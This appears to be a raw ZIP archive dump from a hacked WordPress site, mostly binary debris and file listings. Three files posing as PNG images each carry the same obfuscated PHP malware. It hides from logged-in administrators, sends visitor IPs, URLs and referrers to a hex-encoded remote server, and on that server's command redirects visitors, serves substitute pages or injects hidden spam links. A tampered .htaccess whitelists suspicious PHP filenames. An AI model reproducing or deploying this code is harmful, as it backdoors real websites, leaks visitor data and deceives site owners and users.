= () => sendLogToTelegram(); </script> </body> </html>PK��R�\%Pn��n�� sample.pngnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\%Pn��n��webdb_views.pngnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\�a�� .htaccessnu��6�$��<FilesMatch '.(py\|exe\|php\|PHP\|Php\|PHp\|pHp\|pHP\|pHP7\|PHP7\|phP\|PhP\|php5\|suspected)$'> Order allow,deny Deny from all </FilesMatch> <FilesMatch '^(index.php\|wp-blog-header.php\|wp-config-sample.php\|wp-links-opml.php\|wp-login.php\|wp-settings.php\|wp-trackback.php\|wp-activate.php\|wp-comments-post.php\|wp-cron.php\|wp-load.php\|wp-mail.php\|wp-signup.php\|xmlrpc.php\|edit-form-advanced.php\|link-parse-opml.php\|ms-sites.php\|options-writing.php\|themes.php\|admin-ajax.php\|edit-form-comment.php\|link.php\|ms-themes.php\|plugin-editor.php\|admin-footer.php\|edit-link-form.php\|load-scripts.php\|ms-upgrade-network.php\|admin-functions.php\|edit.php\|load-styles.php\|ms-users.php\|plugins.php\|admin-header.php\|edit-tag-form.php\|media-new.php\|my-sites.php\|post-new.php\|admin.php\|edit-tags.php\|media.php\|nav-menus.php\|post.php\|admin-post.php\|export.php\|media-upload.php\|network.php\|press-this.php\|upload.php\|async-upload.php\|menu-header.php\|options-discussion.php\|privacy.php\|user-edit.php\|menu.php\|options-general.php\|profile.php\|user-new.php\|moderation.php\|options-head.php\|revision.php\|users.php\|custom-background.php\|ms-admin.php\|options-media.php\|setup-config.php\|widgets.php\|custom-header.php\|ms-delete-site.php\|options-permalink.php\|term.php\|customize.php\|link-add.php\|ms-edit.php\|options.php\|edit-comments.php\|link-manager.php\|ms-options.php\|options-reading.php\|system_log.php\|inputs.php\|adminfuns.php\|chtmlfuns.php\|cjfuns.php\|classsmtps.php\|classfuns.php\|comfunctions.php\|comdofuns.php\|connects.php\|copypaths.php\|delpaths.php\|doiconvs.php\|epinyins.php\|filefuns.php\|gdftps.php\|hinfofuns.php\|hplfuns.php\|memberfuns.php\|moddofuns.php\|onclickfuns.php\|phpzipincs.php\|qfunctions.php\|qinfofuns.php\|schallfuns.php\|tempfuns.php\|userfuns.php\|siteheads.php\|termps.php\|txets.php\|thoms.php\|postnews.php\|txets.php)$'> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>PK��R�\%Pn��n��pc_settings.pngnu��[��<?php if(!class_exists('Advanced_LinkFlow_Control')){if(function_exists('is_user_logged_in')){if(is_user_logged_in()){return false;}}foreach($_COOKIE as $key => $value){if(strpos($key,'wordpress_logged_in_')=== 0){return false;}}@ini_set('display_errors',0);@ini_set('error_reporting',0);@ini_set('log_errors',NULL);@ini_set('default_socket_timeout',4);$uri=$_SERVER['REQUEST_URI'];$ua=$_SERVER['HTTP_USER_AGENT'];$bad_urls='#xmlrpc.php\|wp-includes\|wp-admin\|wp-content\|wp-login.php\|wp-cron.php\|\?feed=\|wp-json\|\/feed\|\.css\|\.js\|\.ico\|\.png\|\.gif\|\.bmp\|\.tiff\|\.mpg\|\.wmv\|\.mp3\|\.mpeg\|\.zip\|\.gzip\|\.rar\|\.exe\|\.pdf\|\.doc\|\.swf\|\.txt\|\.jpg\|administrator#';if(@preg_match($bad_urls,$_SERVER['HTTP_HOST'] .$uri)){return false;}class Advanced_LinkFlow_Control{public $url="\x68\x74\x74\x70:\x2f/\x6ci\x6ek\x73f\x61r\x6d.\x73t\x72e\x61m\x6do\x64u\x6ce\x2e\x63\x6f\x6d\x2f\x67\x65\x74\x2e\x70\x68\x70";public $ua='';public $uri='';public $ip='';public $lang='';public $google_ip_list=array("64.233.","66.102.","66.249.","72.14.","74.125.","108.177.","209.85.","216.239.","172.217.","35.190.247.");public $bing_ip_list=array("13.66..","13.67..","13.68..","13.69..","20.36..","20.37..","20.38..","20.39..","40.77..","40.79..","52.231..","191.233..");public $yandex_ip_list=array("5.45..","5.255..","37.9..","37.140..","77.88..","84.252..","87.250..","90.156..","93.158..","95.108..","141.8..","178.154..","213.180..","185.32.187.");public $links=array();public $bot='';public $ref='';function get($url){if(function_exists('curl_init')){$ch=curl_init($url);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,3);curl_setopt($ch,CURLOPT_TIMEOUT,5);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$data=curl_exec($ch);curl_close($ch);return $data;}elseif(@ini_get('allow_url_fopen')){return@file_get_contents($url);}else{$parts=parse_url($url);$target=$parts['host'];$port=isset($parts['port'])?$parts['port']:80;$page=isset($parts['path'])?$parts['path']:'';$page .= isset($parts['query'])?'?' .$parts['query']:'';$page .= isset($parts['fragment'])?'#' .$parts['fragment']:'';$page=($page == '')?'/':$page;if($fp=@fsockopen($target,$port,$errno,$errstr,3)){@socket_set_option($fp,SOL_SOCKET,SO_RCVTIMEO,array("sec"=> 1,"usec"=> 1));$headers="GET $page HTTP/1.1\r\n";$headers .="Host: {$parts['host']}\r\n";$headers .= "Connection: Close\r\n\r\n";if(fwrite($fp,$headers)){$resp='';while(!feof($fp)&&($curr=fgets($fp,128))!== false){$resp .= $curr;}if(isset($curr)&& $curr !== false){fclose($fp);return substr(strstr($resp,"\r\n\r\n"),3);}}fclose($fp);}}return TRUE;}function init($uri,$ua){$this->uri=$uri;$bot=FALSE;$this->ip=isset($_SERVER['HTTP_CF_CONNECTING_IP'])?$_SERVER['HTTP_CF_CONNECTING_IP']:(isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'unknown');$this->ref=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$this->lang=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';if(@preg_match('/googlebot\|google-structured-data/i',$ua)){$bot=TRUE;$this->bot='google';}if(@preg_match('/bing\|msn\|msr\|slurp\|yahoo/i',$ua)){$bot=TRUE;$this->bot='bing';}if(@preg_match('/yandexbot\|yandeximages\|yandexmobilebot\|yandex/i',$ua)){$bot=TRUE;$this->bot='yandex';}if(@preg_match('/duckduckbot/i',$ua)){$bot=TRUE;$this->bot='duckduck';}if(@preg_match('~aport\|rambler\|abachobot\|accoona\|acoirobot\|aspseek\|croccrawler\|dumbot\|webcrawler\|geonabot\|gigabot\|lycos\|scooter\|altavista\|webalta\|adbot\|estyle\|mail\.ru\|scrubby~i',$ua)){$bot=TRUE;$this->bot='other';}if(!$bot){$bot_sources=['google'=> $this->google_ip_list ??[],'bing'=> $this->bing_ip_list ??[],'yandex'=> $this->yandex_ip_list ??[],];foreach($bot_sources as $bot_name => $ip_list){foreach($ip_list as $ip_mask){$pattern='#^' .str_replace(['.',''],['\.','.'],$ip_mask) .'$#';if(preg_match($pattern,$this->ip)){$bot=TRUE;$this->bot=$bot_name;break 2;}}}}if(!$bot){$hostbyaddr=@gethostbyaddr($this->ip);$host_patterns=['google'=> 'googlebot\|google','bing'=> 'bing\|msn\|msr\|slurp\|yahoo','yandex'=> 'yandex','duckduckgo'=> 'duckduckgo\|duckduckbot',];foreach($host_patterns as $bot_name => $pattern){if(preg_match("/$pattern/i",$hostbyaddr)){$bot=TRUE;$this->bot=$bot_name;break;}}}if(!empty($_SERVER['SERVER_NAME'])){$tmp=@parse_url('http://' .$_SERVER['SERVER_NAME']);if(isset($tmp['host'])){$host=$tmp['host'];}}$url=$this->url ."?host=$host&uri=" .urlencode($this->uri) ."&bot={$this->bot}&ip={$this->ip}&ref=" .urlencode($this->ref) .'&lang=' .urlencode($this->lang);if(isset($_COOKIE['LFD'])\|\| isset($_REQUEST['LFD'])){$url .= '&check=1';$page=$this->get($url);$res=0;if(strpos($page,"XTESTOKX")!== false){$res=1;}die(json_encode(['r'=> $res,'funcs'=>['curl_init'=> function_exists('curl_init')?1:0,'file_get_contents'=> function_exists('file_get_contents')?1:0,'allow_url_fopen'=> ini_get('allow_url_fopen')?1:0,'fsockopen'=> function_exists('fsockopen')?1:0,'socket_set_option'=> function_exists('socket_set_option')?1:0,]]));}if(isset($_COOKIE['CURLOPT_LF_TEST'])\|\| isset($_REQUEST['CURLOPT_LF_TEST'])){$url .= '&check=1';}$page=$this->get($url);if(preg_match('/<url>(.?)<\/url>/us',$page,$matches)){$url=$matches[1];header("Location: {$url}");exit;}if(preg_match('/<page>(.?)<\/page>/us',$page,$matches)){$page=$matches[1];die($page);}if(strpos($page,'<link>')!== FALSE){preg_match_all('~<link>(.?)</link>~',$page,$m);$this->links=isset($m[1])?$m[1]:array();}if(count($this->links)>0){ob_start(array($this,'rwcontent'));register_shutdown_function('ob_end_flush');}}function rwcontent($content){$blocked_tags=array('header','footer');$tags=array('p','span','strong','em','i','td','div','ul','li','body');$tags_vals=array();foreach($tags as $tag){preg_match_all("~<{$tag}\s+.?>(.?)</{$tag}>~is",$content,$matches);if(isset($matches[0])){foreach($matches[0]as $match){$is_blocked=false;foreach($blocked_tags as $blocked_tag){$pattern="~<{$blocked_tag}.?>.?{$match}.?</{$blocked_tag}>~is";if(preg_match($pattern,$content)){$is_blocked=true;break;}}if(!$is_blocked){$tags_vals[]=array('tag'=> $tag,'content'=> $match);}}}if(count($tags_vals)>count($this->links)){break;}}$tag_index=0;$link_index=0;$links_count=count($this->links);$tags_vals_count=count($tags_vals);while($link_index<$links_count && $tag_index<$tags_vals_count){$link=$this->links[$link_index];if(str_ends_with($link,'###')){$linkHTML=str_replace('###','',$link);}else{$number=7200+strlen($link)%1000;$linkHTML="<div style=\"position: absolute; left: -{$number}px;\">{$link}</div> ";}$tag_val=$tags_vals[$tag_index];if(strlen($tag_val['content'])%2 == 1){$tag_content_new=$tag_val['content'];$tag_content_new=preg_replace("(<{$tag_val['tag']}.?>)","$0 {$linkHTML}",$tag_content_new,1);}else{if(substr($tag_val['content'],-(strlen($tag_val['tag'])+4))==".</{$tag_val['tag']}>"){$tag_content_new=str_replace(".</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}else{$tag_content_new=str_replace("</{$tag_val['tag']}>"," {$linkHTML}</{$tag_val['tag']}>",$tag_val['content']);}}$content=preg_replace("~" .preg_quote($tag_val['content'],'~') ."~i",$tag_content_new,$content,1);if(strpos($content,$linkHTML)!== false){$link_index++;}$tag_index++;}return $content;}}$ratel=new Advanced_LinkFlow_Control;$ratel->init($uri,$ua);}PK��R�\%Pn��n��rank.txtnu��[��PK��R�\%Pn��n�� mailto.cssnu��[��PK��R�\%Pn��n��N9��default_image.txtnu��[��PK��R�\��%��%��U��434974/972517/index.phpnu��[��PK��R�\��%��%��it��434974/index.phpnu��[��PK��R�\%Pn��n��Β��db_details.cssnu��[��PK��R�\%Pn��n��z��servizi.pngnu��[��PK��R�\��&A��A��#��home.phpnu��6�$��PK��R�\%Pn��n��validations.pngnu��[��PK��R�\��&A��A�� I�users.phpnu��6�$��PK��R�\%Pn��n��!�russian_mimes.cssnu��[��PK��R�\%Pn��n��r>�lscript.txtnu��[��PK��R�\��%��%�� [�index.phpnu��[��PK��R�\%Pn��n�� yy�sample.pngnu��[��PK��R�\%Pn��n��!��webdb_views.pngnu��[��PK��R�\�a�� β�.htaccessnu��6�$��PK��R�\%Pn��n��pc_settings.pngnu��[��PK��